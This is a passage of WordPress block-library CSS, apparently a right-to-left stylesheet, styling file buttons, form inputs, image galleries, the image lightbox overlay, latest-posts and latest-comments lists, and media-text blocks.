border-radius:2em; display:inline-block; padding:.5em 1em; } :where(.wp-block-file__button):where(a):active,:where(.wp-block-file__button):where(a):focus,:where(.wp-block-file__button):where(a):hover,:where(.wp-block-file__button):where(a):visited{ box-shadow:none; color:#fff; opacity:.85; text-decoration:none; } .wp-block-form-input__label{ display:flex; flex-direction:column; gap:.25em; margin-bottom:.5em; width:100%; } .wp-block-form-input__label.is-label-inline{ align-items:center; flex-direction:row; gap:.5em; } .wp-block-form-input__label.is-label-inline .wp-block-form-input__label-content{ margin-bottom:.5em; } .wp-block-form-input__label:has(input[type=checkbox]){ flex-direction:row; width:fit-content; } .wp-block-form-input__label:has(input[type=checkbox]) .wp-block-form-input__label-content{ margin:0; } .wp-block-form-input__label:has(.wp-block-form-input__label-content+input[type=checkbox]){ flex-direction:row-reverse; } .wp-block-form-input__label-content{ width:fit-content; } :where(.wp-block-form-input__input){ font-size:1em; margin-bottom:.5em; padding:0 .5em; } :where(.wp-block-form-input__input)[type=date],:where(.wp-block-form-input__input)[type=datetime-local],:where(.wp-block-form-input__input)[type=datetime],:where(.wp-block-form-input__input)[type=email],:where(.wp-block-form-input__input)[type=month],:where(.wp-block-form-input__input)[type=number],:where(.wp-block-form-input__input)[type=password],:where(.wp-block-form-input__input)[type=search],:where(.wp-block-form-input__input)[type=tel],:where(.wp-block-form-input__input)[type=text],:where(.wp-block-form-input__input)[type=time],:where(.wp-block-form-input__input)[type=url],:where(.wp-block-form-input__input)[type=week]{ border-style:solid; border-width:1px; line-height:2; min-height:2em; } textarea.wp-block-form-input__input{ min-height:10em; } .blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){ display:flex; flex-wrap:wrap; list-style-type:none; margin:0; padding:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{ display:flex; flex-direction:column; flex-grow:1; justify-content:center; margin:0 0 1em 1em; position:relative; width:calc(50% - 1em); } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){ margin-left:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{ align-items:flex-end; display:flex; height:100%; justify-content:flex-start; margin:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{ display:block; height:auto; max-width:100%; width:auto; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{ background:linear-gradient(0deg, #000000b3, #0000004d 70%, #0000); bottom:0; box-sizing:border-box; color:#fff; font-size:.8em; margin:0; max-height:100%; overflow:auto; padding:3em .77em .7em; position:absolute; text-align:center; width:100%; z-index:2; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{ display:inline; } .blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{ flex-grow:1; } .blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{ flex:1; height:100%; object-fit:cover; width:100%; } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{ margin-left:0; width:100%; } @media (min-width:600px){ .blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{ margin-left:1em; width:calc(33.33333% - .66667em); } .blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{ margin-left:1em; width:calc(25% - .75em); } .blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{ margin-left:1em; width:calc(20% - .8em); } .blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{ margin-left:1em; width:calc(16.66667% - .83333em); } .blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{ margin-left:1em; width:calc(14.28571% - .85714em); } .blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{ margin-left:1em; width:calc(12.5% - .875em); } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){ margin-left:0; } } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{ margin-left:0; } .blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{ max-width:420px; width:100%; } .blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{ justify-content:center; } .wp-block-gallery:not(.is-cropped) .blocks-gallery-item{ align-self:flex-start; } figure.wp-block-gallery.has-nested-images{ align-items:normal; } .wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){ margin:0; width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2); } .wp-block-gallery.has-nested-images figure.wp-block-image{ box-sizing:border-box; display:flex; flex-direction:column; flex-grow:1; justify-content:center; max-width:100%; position:relative; } .wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{ flex-direction:column; flex-grow:1; margin:0; } .wp-block-gallery.has-nested-images figure.wp-block-image img{ display:block; height:auto; max-width:100% !important; width:auto; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{ bottom:0; left:0; max-height:100%; position:absolute; right:0; } .wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{ backdrop-filter:blur(3px); content:""; height:100%; -webkit-mask-image:linear-gradient(0deg, #000 20%, #0000); mask-image:linear-gradient(0deg, #000 20%, #0000); max-height:40%; pointer-events:none; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ box-sizing:border-box; color:#fff; font-size:13px; margin:0; overflow:auto; padding:1em; text-align:center; text-shadow:0 0 1.5px #000; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{ height:12px; width:12px; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{ background-color:initial; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{ background-color:#fffc; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{ scrollbar-color:#fffc #0000; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ will-change:transform; } @media (hover:none){ .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ scrollbar-color:#fffc #0000; } } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ background:linear-gradient(0deg, #0006, #0000); } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{ display:inline; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{ color:inherit; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{ flex:1 1 auto; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{ background:none; color:inherit; flex:initial; margin:0; padding:10px 10px 9px; position:relative; text-shadow:none; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border:before,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded:before{ content:none; } .wp-block-gallery.has-nested-images figcaption{ flex-basis:100%; flex-grow:1; text-align:center; } .wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){ margin-bottom:auto; margin-top:0; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){ align-self:inherit; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){ display:flex; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{ flex:1 0 0%; height:100%; object-fit:cover; width:100%; } .wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){ width:100%; } @media (min-width:600px){ .wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){ width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){ width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75); } .wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){ width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8); } .wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){ width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333); } .wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){ width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714); } .wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){ width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){ width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){ width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{ width:100%; } } .wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{ max-width:420px; width:100%; } .wp-block-gallery.has-nested-images.aligncenter{ justify-content:center; } .wp-block-group{ box-sizing:border-box; } :where(.wp-block-group.wp-block-group-is-layout-constrained){ position:relative; } h1:where(.wp-block-heading).has-background,h2:where(.wp-block-heading).has-background,h3:where(.wp-block-heading).has-background,h4:where(.wp-block-heading).has-background,h5:where(.wp-block-heading).has-background,h6:where(.wp-block-heading).has-background{ padding:1.25em 2.375em; } h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){ rotate:180deg; } .wp-block-image>a,.wp-block-image>figure>a{ display:inline-block; } .wp-block-image img{ box-sizing:border-box; height:auto; max-width:100%; vertical-align:bottom; } @media not (prefers-reduced-motion){ .wp-block-image img.hide{ visibility:hidden; } .wp-block-image img.show{ animation:show-content-image .4s; } } .wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{ border-radius:inherit; } .wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-image.aligncenter{ text-align:center; } .wp-block-image.alignfull>a,.wp-block-image.alignwide>a{ width:100%; } .wp-block-image.alignfull img,.wp-block-image.alignwide img{ height:auto; width:100%; } .wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{ display:table; } .wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{ caption-side:bottom; display:table-caption; } .wp-block-image .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-image .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-image .aligncenter{ margin-left:auto; margin-right:auto; } .wp-block-image :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .wp-block-image.is-style-circle-mask img{ border-radius:9999px; } @supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){ .wp-block-image.is-style-circle-mask img{ border-radius:0; -webkit-mask-image:url('data:image/svg+xml;utf8,'); mask-image:url('data:image/svg+xml;utf8,'); mask-mode:alpha; -webkit-mask-position:center; mask-position:center; -webkit-mask-repeat:no-repeat; mask-repeat:no-repeat; -webkit-mask-size:contain; mask-size:contain; } } :root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){ border-radius:9999px; } .wp-block-image figure{ margin:0; } .wp-lightbox-container{ display:flex; flex-direction:column; position:relative; } .wp-lightbox-container img{ cursor:zoom-in; } .wp-lightbox-container img:hover+button{ opacity:1; } .wp-lightbox-container button{ align-items:center; backdrop-filter:blur(16px) saturate(180%); background-color:#5a5a5a40; border:none; border-radius:4px; cursor:zoom-in; display:flex; height:20px; justify-content:center; left:16px; opacity:0; padding:0; position:absolute; text-align:center; top:16px; width:20px; z-index:100; } @media not (prefers-reduced-motion){ .wp-lightbox-container button{ transition:opacity .2s ease; } } .wp-lightbox-container button:focus-visible{ outline:3px auto #5a5a5a40; outline:3px auto -webkit-focus-ring-color; outline-offset:3px; } .wp-lightbox-container button:hover{ cursor:pointer; opacity:1; } .wp-lightbox-container button:focus{ opacity:1; } .wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){ background-color:#5a5a5a40; border:none; } .wp-lightbox-overlay{ box-sizing:border-box; cursor:zoom-out; height:100vh; overflow:hidden; position:fixed; right:0; top:0; visibility:hidden; width:100%; z-index:100000; } .wp-lightbox-overlay .close-button{ align-items:center; cursor:pointer; display:flex; justify-content:center; left:calc(env(safe-area-inset-left) + 16px); min-height:40px; min-width:40px; padding:0; position:absolute; top:calc(env(safe-area-inset-top) + 16px); z-index:5000000; } .wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){ background:none; border:none; } .wp-lightbox-overlay .lightbox-image-container{ height:var(--wp--lightbox-container-height); overflow:hidden; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); transform-origin:top right; width:var(--wp--lightbox-container-width); z-index:9999999999; } .wp-lightbox-overlay .wp-block-image{ align-items:center; box-sizing:border-box; display:flex; height:100%; justify-content:center; margin:0; position:relative; transform-origin:100% 0; width:100%; z-index:3000000; } .wp-lightbox-overlay .wp-block-image img{ height:var(--wp--lightbox-image-height); min-height:var(--wp--lightbox-image-height); min-width:var(--wp--lightbox-image-width); width:var(--wp--lightbox-image-width); } .wp-lightbox-overlay .wp-block-image figcaption{ display:none; } .wp-lightbox-overlay button{ background:none; border:none; } .wp-lightbox-overlay .scrim{ background-color:#fff; height:100%; opacity:.9; position:absolute; width:100%; z-index:2000000; } .wp-lightbox-overlay.active{ visibility:visible; } @media not (prefers-reduced-motion){ .wp-lightbox-overlay.active{ animation:turn-on-visibility .25s both; } .wp-lightbox-overlay.active img{ animation:turn-on-visibility .35s both; } .wp-lightbox-overlay.show-closing-animation:not(.active){ animation:turn-off-visibility .35s both; } .wp-lightbox-overlay.show-closing-animation:not(.active) img{ animation:turn-off-visibility .25s both; } .wp-lightbox-overlay.zoom.active{ animation:none; opacity:1; visibility:visible; } .wp-lightbox-overlay.zoom.active .lightbox-image-container{ animation:lightbox-zoom-in .4s; } .wp-lightbox-overlay.zoom.active .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.active .scrim{ animation:turn-on-visibility .4s forwards; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active){ animation:none; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{ animation:lightbox-zoom-out .4s; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{ animation:none; } .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{ animation:turn-off-visibility .4s forwards; } } @keyframes show-content-image{ 0%{ visibility:hidden; } 99%{ visibility:hidden; } to{ visibility:visible; } } @keyframes turn-on-visibility{ 0%{ opacity:0; } to{ opacity:1; } } @keyframes turn-off-visibility{ 0%{ opacity:1; visibility:visible; } 99%{ opacity:0; visibility:visible; } to{ opacity:0; visibility:hidden; } } @keyframes lightbox-zoom-in{ 0%{ transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); } to{ transform:translate(50%, -50%) scale(1); } } @keyframes lightbox-zoom-out{ 0%{ transform:translate(50%, -50%) scale(1); visibility:visible; } 99%{ visibility:visible; } to{ transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale)); visibility:hidden; } } ol.wp-block-latest-comments{ box-sizing:border-box; margin-right:0; } :where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){ line-height:1.1; } :where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){ line-height:1.8; } .has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){ line-height:1.5; } .wp-block-latest-comments .wp-block-latest-comments{ padding-right:0; } .wp-block-latest-comments__comment{ list-style:none; margin-bottom:1em; } .has-avatars .wp-block-latest-comments__comment{ list-style:none; min-height:2.25em; } .has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{ margin-right:3.25em; } .wp-block-latest-comments__comment-excerpt p{ font-size:.875em; margin:.36em 0 1.4em; } .wp-block-latest-comments__comment-date{ display:block; font-size:.75em; } .wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{ border-radius:1.5em; display:block; float:right; height:2.5em; margin-left:.75em; width:2.5em; } .wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{ font-size:inherit; } .wp-block-latest-posts{ box-sizing:border-box; } .wp-block-latest-posts.alignleft{ margin-right:2em; } .wp-block-latest-posts.alignright{ margin-left:2em; } .wp-block-latest-posts.wp-block-latest-posts__list{ list-style:none; } .wp-block-latest-posts.wp-block-latest-posts__list li{ clear:both; overflow-wrap:break-word; } .wp-block-latest-posts.is-grid{ display:flex; flex-wrap:wrap; } .wp-block-latest-posts.is-grid li{ margin:0 0 1.25em 1.25em; width:100%; } @media (min-width:600px){ .wp-block-latest-posts.columns-2 li{ width:calc(50% - .625em); } .wp-block-latest-posts.columns-2 li:nth-child(2n){ margin-left:0; } .wp-block-latest-posts.columns-3 li{ width:calc(33.33333% - .83333em); } .wp-block-latest-posts.columns-3 li:nth-child(3n){ margin-left:0; } .wp-block-latest-posts.columns-4 li{ width:calc(25% - .9375em); } .wp-block-latest-posts.columns-4 li:nth-child(4n){ margin-left:0; } .wp-block-latest-posts.columns-5 li{ width:calc(20% - 1em); } .wp-block-latest-posts.columns-5 li:nth-child(5n){ margin-left:0; } .wp-block-latest-posts.columns-6 li{ width:calc(16.66667% - 1.04167em); } .wp-block-latest-posts.columns-6 li:nth-child(6n){ margin-left:0; } } :root :where(.wp-block-latest-posts.is-grid){ padding:0; } :root :where(.wp-block-latest-posts.wp-block-latest-posts__list){ padding-right:0; } .wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{ display:block; font-size:.8125em; } .wp-block-latest-posts__post-excerpt,.wp-block-latest-posts__post-full-content{ margin-bottom:1em; margin-top:.5em; } .wp-block-latest-posts__featured-image a{ display:inline-block; } .wp-block-latest-posts__featured-image img{ height:auto; max-width:100%; width:auto; } .wp-block-latest-posts__featured-image.alignleft{ float:left; margin-right:1em; } .wp-block-latest-posts__featured-image.alignright{ float:right; margin-left:1em; } .wp-block-latest-posts__featured-image.aligncenter{ margin-bottom:1em; text-align:center; } ol,ul{ box-sizing:border-box; } :root :where(.wp-block-list.has-background){ padding:1.25em 2.375em; } .wp-block-loginout{ box-sizing:border-box; } .wp-block-math{ overflow-x:auto; overflow-y:hidden; } .wp-block-media-text{ box-sizing:border-box; direction:ltr; display:grid; grid-template-columns:50% 1fr; grid-template-rows:auto; } .wp-block-media-text.has-media-on-the-right{ grid-template-columns:1fr 50%; } .wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{ align-self:start; } .wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{ align-self:center; } .wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{ align-self:end; } .wp-block-media-text>.wp-block-media-text__media{ grid-column:1; grid-row:1; margin:0; } .wp-block-media-text>.wp-block-media-text__content{ direction:rtl; grid-column:2; grid-row:1; padding:0 8%; word-break:break-word; } .wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{ grid-column:2; grid-row:1; } .wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{ grid-column:1; grid-row:1; } .wp-block-media-text__media a{ display:block; } .wp-block-media-text__media img,.wp-block-media-text__media video{ height:auto; max-width:unset; vertical-align:middle; width:100%; } .wp-block-media-text.is-image-fill>.wp-block-media-text__media{ background-size:cover; height:100%; min-height:250px; } .wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{ display:block; height:100%; } .wp-block-media-text.is-image-fill>.wp-block-media-text__media img{ height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; clip:rect(0, 0, 0, 0); border:0; } .wp-block-media-text.is-image-fill-element>.wp-block-media-text__media{ height:100%; min-height:250px; position:relative; } .wp-block-media-text.is-image-fill-element>.wp-block-media-text__media>a{ display:block; height:100%; } .wp-block-media-text.is-image-fill-element>.wp-block-media-text__media img{ height:100%; object-fit:cover; position:absolute; width:100%; } @media 